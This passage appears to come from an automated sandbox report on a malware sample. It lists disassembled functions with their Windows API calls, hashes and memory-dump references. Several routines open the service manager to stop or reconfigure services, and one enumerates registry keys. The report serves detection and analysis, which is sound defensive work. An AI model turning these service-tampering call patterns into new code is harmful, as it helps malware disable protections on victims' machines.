                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08219F3D9002189BCF21DA64DC5CEDB3769EF44714F104696E86DE31A1DB309A95CF91
                                                                                                                                                                                                                                                                                                                              Function 00419DFC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
                                                                                                                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
                                                                                                                                                                                                                                                                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 493672254-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 68f1e835941cc6574ae3172da8245a4dbba7b98562f75027ccb4571b71c43179
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 40159264159f5a90cd52f9b689d0e8cb5e0ea154c732c405bcbf7063391161e0
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68f1e835941cc6574ae3172da8245a4dbba7b98562f75027ccb4571b71c43179
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09016D311083107AE3118B34EC1EFBF3B5CDB41B70F00023BF626922D1DA68CE8581A9
                                                                                                                                                                                                                                                                                                                              Function 00437E16 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
                                                                                                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
                                                                                                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b42a492c3bf34377e6814907667dc2d2d4637d0875d9ccbe0f9eef23a1c86691
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b42a492c3bf34377e6814907667dc2d2d4637d0875d9ccbe0f9eef23a1c86691
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C
                                                                                                                                                                                                                                                                                                                              Function 02833856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,02833518,028323F1,02831F17), ref: 02833864
                                                                                                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02833872
                                                                                                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0283388B
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,02833518,028323F1,02831F17), ref: 028338DD
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3d9dad07d9ee3adc9e3bffcbca55177b08bc664bcbbb23e51276d0060e209a44
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9d03266e25a959d28f3ccb45009d6f7b5901133ef97c04752e8439575ada45fb
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d9dad07d9ee3adc9e3bffcbca55177b08bc664bcbbb23e51276d0060e209a44
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2201243EE097156EA616397D7C84A962B95DB0573472003A9E014E80E0EF515820C7C0
                                                                                                                                                                                                                                                                                                                              Function 00446ECF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                              • _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F
                                                                                                                                                                                                                                                                                                                              Function 02835AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,02836C6C), ref: 02835AFA
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835B2D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835B55
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,02836C6C), ref: 02835B62
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,02836C6C), ref: 02835B6E
                                                                                                                                                                                                                                                                                                                              • _abort.LIBCMT ref: 02835B74
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 8ec780b4f84e5a1ee1d158e99ee359f1bfde862824746fa51cd89eeb27eafacc
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e1e4ceb8db7d8c9e4601bf7903fb15a6991304db0dd28783d5a3899655a4d0bf
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ec780b4f84e5a1ee1d158e99ee359f1bfde862824746fa51cd89eeb27eafacc
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55F0A4BE984500ABD61332387C48F9A266B8BDDB75BA50924F819E61C0FF3C850285E6
                                                                                                                                                                                                                                                                                                                              Function 10016A7C Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,1000310F,1000E403,1000310F,?,?,1000FF84,?,1000310F,?), ref: 10016A80
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10016AB3
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10016ADB
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,1000310F,?,?,?,?,?,?,?,?,100147C0,?,00000000,?,1000310F), ref: 10016AE8
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,1000310F,?,?,?,?,?,?,?,?,100147C0,?,00000000,?,1000310F), ref: 10016AF4
                                                                                                                                                                                                                                                                                                                              • _abort.LIBCMT ref: 10016AFA
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: abb8dc7b00a9e6ff34b690eb976e7739615ebad0393437c6e772e82f3a0abea1
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 628ed4293515944fb4ff5177b0ed0b0109413660cb9ab4ef9b2c29076bfe53c7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: abb8dc7b00a9e6ff34b690eb976e7739615ebad0393437c6e772e82f3a0abea1
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39F02839140612B6D212D3649C87F5F32A6EFC96B1BB98124FE18BE191EF31DCD28463
                                                                                                                                                                                                                                                                                                                              Function 00419C30 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
                                                                                                                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
                                                                                                                                                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 221034970-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: cb23a265b501da1ed9a271a63ec08baaa1bf9c1cf5a7cec22900b30d8e19d8fa
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 508c6a04514e5737773cd2f196b8466aacbf0489f3ca208dfe1df169d6e4b917
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb23a265b501da1ed9a271a63ec08baaa1bf9c1cf5a7cec22900b30d8e19d8fa
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93F0F6325403147BD3116B25EC89EFF3BACDB85BA1F000036F941921D2DB68CD4685F5
                                                                                                                                                                                                                                                                                                                              Function 00419D32 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
                                                                                                                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
                                                                                                                                                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 221034970-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 87463e1bdf8bb651a0013945517c704a9b2de3a64a82b3cc186aeafb224c7010
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e3947c2d1caeee04707242a29777fdfa1156a9fa4bc9e6dc5536219c00a7af20
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87463e1bdf8bb651a0013945517c704a9b2de3a64a82b3cc186aeafb224c7010
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88F0C2325002146BD2116B25FC49EBF3AACDB85BA1B00003AFA06A21D2DB38CD4685F9
                                                                                                                                                                                                                                                                                                                              Function 00419D97 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
                                                                                                                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
                                                                                                                                                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 221034970-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ab1a1cc1830ffa19df902a2de4304976c1de8e56a3f0d841ebfd0113734f6356
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab1a1cc1830ffa19df902a2de4304976c1de8e56a3f0d841ebfd0113734f6356
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8
                                                                                                                                                                                                                                                                                                                              Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Enum$InfoQueryValue
                                                                                                                                                                                                                                                                                                                              • String ID: [regsplt]$DG
                                                                                                                                                                                                                                                                                                                              • API String ID: 3554306468-1089238109
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0b7bbb552e40338816289a98cd896a09b6e43960cdf587263c80e1af3b640034
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b7bbb552e40338816289a98cd896a09b6e43960cdf587263c80e1af3b640034
